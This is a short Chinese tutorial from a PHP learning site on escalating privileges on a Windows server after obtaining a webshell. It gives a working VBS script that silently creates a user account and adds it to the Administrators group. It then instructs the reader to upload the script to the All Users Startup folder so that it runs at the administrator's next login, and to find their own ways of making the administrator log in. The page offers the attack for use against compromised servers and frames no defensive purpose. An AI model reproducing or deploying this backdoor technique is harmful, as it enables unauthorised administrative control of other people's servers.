来源:自学PHP网 时间:2015-04-15 14:59 作者: 阅读:次
[导读] 我们在拿到一个网站的webshell的时候如果想进一步的获得网站的服务器权限 我们可以查看现在服务器上系统盘的可读可写目录 如果说服务器上的C: Documents and Settings All Users 「开始」菜...
|
我们在拿到一个网站的webshell的时候如果想进一步的获得网站的服务器权限.
我们可以查看现在服务器上系统盘的可读可写目录
如果说服务器上的 C:\Documents and Settings\All Users\「开始」菜单\程序\启动 ‘目录存在可读可写目录
那么我们就可以执行上传一个vbs或者bat的脚本进行提权。
这里我就具体来讲解下用vbs脚本进行提权,来添加用户。
1.我们先写一个vbs的添加用户密码的脚本 脚本代码如下 大家可自行修改用户密码。
set wshshell=createobject ("wscript.shell")
a=wshshell.run ("cmd.exe /c net user 用户名 密码 /add",0)
b=wshshell.run ("cmd.exe /c net localgroup Administrators 用户名 /add",0)
修改帐号密码后然后复制以上代码 然后保存为.vbs的文件 文件名任意。
2.保存以后将来vbs脚本上传到 C:\Documents and Settings\All Users\「开始」菜单\程序\启动
然后我们就提权结束,等目标服务器再次登录的时候即可自动添加帐号密码。
PS: 对于有耐心的朋友可以通过,这种方法来进行提权尝试。 当然我们的目标是让管理员登录服务器。 至于怎么做大家自行发挥。
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
